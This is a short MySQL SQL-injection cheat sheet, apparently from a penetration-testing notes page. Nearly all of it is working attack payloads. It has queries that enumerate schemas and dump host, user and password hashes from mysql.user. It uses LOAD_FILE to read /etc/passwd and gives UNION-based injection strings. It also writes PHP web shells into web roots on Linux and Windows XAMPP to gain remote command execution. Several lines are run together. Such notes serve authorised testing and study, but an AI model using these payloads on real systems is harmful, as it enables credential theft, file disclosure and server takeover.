MySQL Cheatsheet
SELECT database()
SELECT schema_name FROM information_schema.schemata
SELECT schema_name FROM information_schema.schemata LIMIT 1
SELECT schema_name FROM information_schema.schemata LIMIT 2,1 <-- Grab second entry output limit of 1
SELECT group_concat(schema_name,":") FROM information_schema.schemata
SELECT group_concat(schema_name,"\r\n") FROM information_schema.schemata
SELECT group_concat(host,":",user,":",password,"\r\n") FROM mysql.userSELECT schema_name FROM information_schema.schemata
select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'select group_concat(host,":",user,":",password,"\r\n") from mysql.userLOAD_FILE("/etc/passwd")
TO_base64(LOAD_FILE("/etc/passwd"))'union select 1,2,3,4,5-- -
' union select 1, table_name, column_name, table_schema, 5 from
information_schema.columns where table_schema=database() -- //SQL injection into RCE
select user()Check write privileges
select group_concat(grantee,is_grantable,0x3c62723e) from information_schema.user_privilegesFor Linux
union select ("<?php system($_GET["cmd"]);?>),2,3,4,5 into outfile
"/var/www/html/cmd.php" -- -' UNION SELECT "<?php system($_GET['cmd']);?>", null, null,
null, null INTO OUTFILE "/var/www/html/tmp/cmd.php" -- -For Windows Xampp
union select 1,('<?php echo shell_exec($_GET["cmd"]); ?>'),3 into outfile 'C:\\xampp\\htdocs\\cmd.php'-- -Last updated